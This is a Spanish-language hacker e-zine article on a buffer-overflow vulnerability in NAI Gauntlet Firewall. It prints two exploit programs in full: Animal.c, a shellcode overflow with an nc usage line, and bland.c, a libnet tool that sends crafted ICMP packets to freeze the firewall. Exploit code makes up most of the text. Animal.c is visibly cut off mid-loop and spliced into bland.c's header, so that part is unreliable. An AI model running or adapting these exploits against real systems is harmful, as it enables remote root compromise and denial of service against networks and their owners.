============================================================================= --------------------------------------------------------------------------02- -----( Gauntlet Firewall )---------------------------------------------RM-11] -----[ Radikall ]--------------------------------------[radikal@hushmail.com] ---------------------------------------- Gauntlet Firewall Remote Buffer Overflow Vulnerability de Network Associates By Radikall ---------------------------------------- Equipos Vulnerables: Associates Gauntlet Firewall 5.5 Network Associates Gauntlet Firewall 5.0 Network Associates Gauntlet Firewall 4.2 Network Associates Gauntlet Firewall 4.1 Network Associates WebShield E-ppliance 300.0 Network Associates WebShield E-ppliance 100.0 Network Associates WebShield for Solaris 4.0 Acerca del Bug: Una capacidad excesiva de la memoria intermedia existe en la version de software del Cyber Pattrol de NAI integrado en el firewall de NAI Gauntlet, las versiones 4.1, 4.2, 5.0 y 5.5. Debido a la manera en la cual Cyber Pattrol se integro, una vulnerabilidad se introdujo que podria permitir a un Hacker el acceso remoto a raiz (root) en el firewall, o ejecutar las ordenes arbitrariamente en el firewall. Por omision, el Cyber Pattrol se instala cuando instalas el Firewall Gauntlet, y corre por 30 dias. Despues de este periodo, se inahabilita, Durante este periodo de 30 dias, el firewall esta susceptible al ataque, debido al software que filtra es externamente accesible, los propios usuarios en la red interna pueden ser tambien capaces de explotar la vulnerabilidad. Informacion del Exploit: El exploit esta escrito para correr un archivo de prueba llamado /bin/zz. Crea un archivo zz en /bin en el firewall de gauntlet y chmod a 700. Dentro del archivo zz debes de tener .log donde te aparecera lo siguiente: --- #!/bin/sh echo "IT RAN" > /tmp/TEST --- El Exploit: ------------------------- Comienza Animal.c ------------------------------ /* * Animal.c * * * Remote Gauntlet BSDI proof of concept exploit. * Garrison technologies may have found it, but I am the * one who released it. ;) I do not have a Sparc or I would * write up the Solaris one too. If you have one, please * make the changes needed and post it. Thanks. * * Script kiddies can go away, this will only execute a file * named /bin/zz on the remote firewall. To test this code, * make a file named /bin/zz and chmod it to 700. * I suggest for the test you just have the zz file make a note * in syslog or whatever makes you happy. * * This code is intened for proof of concept only. * * * _Gramble_ * Hey BuBBles * *To use: * # Animal | nc

8999 */ #include char data[364]; main() { int i; char shelloutput[80]; /* just borrowed this execute code from another exploit */ unsigned char shell[] = "\x90" "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00"; for(i=0;i<264;i++) data[i]=0x90; data[i]=0x30;i++; data[i]=0x9b;i++; data[i]=0xbf;i++; data[i]=0xef;i++; data[i] = 0x00; for (i=0; i <- Send money to :-) * aka Mike Frantzen <- Reply to * * Network Associates: "Who's watching your network?" * MSG.net "Who's watching the watchers?" * * This can be found online at http://www.msg.net/firewalls/tis/bland.c * * Description: * If you know an IP that will be routed through a Gauntlet 5.0 Firewall, * you can remotely lock up the firewall (tested against Solaris 2.6 and * BSDI). It locks up to the point that one packet will disable STOP-A * (L1-A) on Sparcs and ~3-5 packets will disable Ctrl-Alt-Del on BSDI * (Ctrl-Alt-Del still prompts Y/N but it never reboots). * * **You can NOT send this to the Gauntlet's IP. The packet must be one * **that would go through the forwarding code. * * If you are on local ether to the firewall, set it as your default route * or otherwise send the packet to the firewall's MAC. * * The packet is parsed before the packet filtering rules in Gauntlet. So * the only known work-around is to ACL out ICMP type 12 at your screening * router. * Or you could switch to Gauntlet 5.5 which (in the beta) does not seem to * be vulnerable -- but 5.5 introduces some new 'issues'. * * * Technical Description of the packet: * The packet is an ICMP Paramater Problem packet that encapsulates an IP * packet with IP Options. There is a random protocol in the encapsulated * IP packet. The trick is: the inner packet MUST have IP Options. Some * options work, some don't. * The firewall apparently is looking for the packet (or an entry in its * transparency table) that matches the encapsulated packet. It just keeps * looking.... It likely has interrupts masked off on Solaris. * * * You need libnet to link this against. It's a pretty spiffy lib. * http://www.infonexus.com/~daemon9/Projects/Libnet * http://www.packetfactory.net/libnet * * * For da script kiddies: * Compile with 'gcc -o bland bland.c -lnet' * ./bland -d * (Did you remember to install Libnet???) * * * If it doesn't compile on your machine: I DON'T CARE!!! This program was * a quick and dirty hack. You try reading a hexdump of a packet off the * wire and writing something that can reproduce it. * I know it compiles and works from FreeBSD 3.1 * * * Network Associates (TIS) was notified two weeks ago and they are working * on a patch. * * * Plugs: * ISIC -- Program I used (and wrote) to find bugs in Gauntlet's IP stack. * http://expert.cc.purdue.edu/~frantzen/isic-0.02.tar.gz * Libnet -- Was able to write the basic exploit in 20 minutes because of * libnet. See libnet link above. Thanks go out to Route! * * * Credits: * Mike Frantzen Hey, thats me! * Mike Scher * Kevin Kadow <- Gauntlet Random Seed Hole * Lenard Lynch * Viki Navratilova */ #include int main(int argc, char **argv) { u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0; u_long *problem = NULL; u_char *packet = NULL; int sock, c, len = 0; long acx, count = 1; struct icmp *icmp; struct ip *ip; /* It appears that most IP options of length >0 will work * Works with 128, 64, 32, 16... And the normal ones 137... * Does not work with 0, 1 */ u_char data[] = {137}; int data_len = sizeof(data); printf("Written by Mike Frantzen... \n"); printf("For test purposes only... yada yada yada...\n"); src_ip = inet_addr("10.10.10.10"); while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) { switch(c) { case 'd': dst_ip = libnet_name_resolve(optarg, 1); break; case 's': src_ip = libnet_name_resolve(optarg, 1); break; case 'D': ins_dst_ip = name_resolve(optarg, 1); break; case 'S': ins_src_ip = name_resolve(optarg, 1); break; case 'l': data_len = atoi(optarg); break; case 'c': if ( (count = atol(optarg)) < 1) count = 1; break; default: printf("Don't understand option.\n"); exit(-1); } } if ( dst_ip == 0 ) { printf("Usage: %s\t -d \t[-s ]\n", rindex(argv[0], '/') == NULL ? argv[0] : rindex(argv[0], '/') + 1); printf("\t\t[-S ]\t[-D ]\n"); printf("\t\t[-l ]\t[-c <# to send>]\n"); exit(-1); } if ( ins_dst_ip == 0 ) ins_dst_ip = src_ip; if ( ins_src_ip == 0 ) ins_src_ip = dst_ip; if ( (packet = malloc(1500)) == NULL ) { perror("malloc: "); exit(-1); } if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) { perror("socket: "); exit(-1); } /* 8 is the length of the ICMP header with the problem field */ len = 8 + IP_H + data_len; bzero(packet + IP_H, len); libnet_build_ip(len, /* Size of the payload */ 0xc2, /* IP tos */ 30241, /* IP ID */ 0, /* Frag Offset & Flags */ 64, /* TTL */ IPPROTO_ICMP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload */ 0, packet); /* Packet memory */ /* ICMP Header for Parameter Problem * --------------+---------------+---------------+--------------- *| Type (12) | Code (0) | Checksum | * --------------+---------------+---------------+--------------- *| Pointer | unused | * --------------+---------------+---------------+--------------- * Internet Header + 64 bits of original datagram data.... */ icmp = (struct icmp *) (packet + IP_H); problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */ icmp->icmp_type = ICMP_PARAMPROB; icmp->icmp_code = 0; /* Indicates a problem pointer */ *problem = htonl(0x14000000); /* Problem is 20 bytes into it */ /* Need to embed an IP packet within the ICMP */ ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */ ip->ip_v = 0x4; /* IPV4 */ ip->ip_hl = 0xf; /* Some IP Options */ ip->ip_tos = 0xa3; /* Whatever */ ip->ip_len = htons(data_len); /* Length of packet */ ip->ip_id = 30241; /* Whatever */ ip->ip_off = 0; /* No frag's */ ip->ip_ttl = 32; /* Whatever */ ip->ip_p = 98; /* Random protocol */ ip->ip_sum = 0; /* Will calc later */ ip->ip_src.s_addr = ins_src_ip; ip->ip_dst.s_addr = ins_dst_ip; /* Move our data block into the packet */ bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len); /* I hate checksuming. Spent a day trying to get it to work in * perl... That sucked... Tequilla would have helped immensly. */ libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len); /* Bah... See above comment.... */ libnet_do_checksum(packet, IPPROTO_ICMP, len); printf("Sending %li packets", count); for (acx = 0; acx < count; acx++) { if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H)) perror("write_ip: "); else printf("."); } printf("\n\n"); return( 0 ); } ------------------------- Termina bland.c ----------------------------- Fin Esto ha sido todo acerca de las vulnerabilidades del Gautlet Firewall. Radikall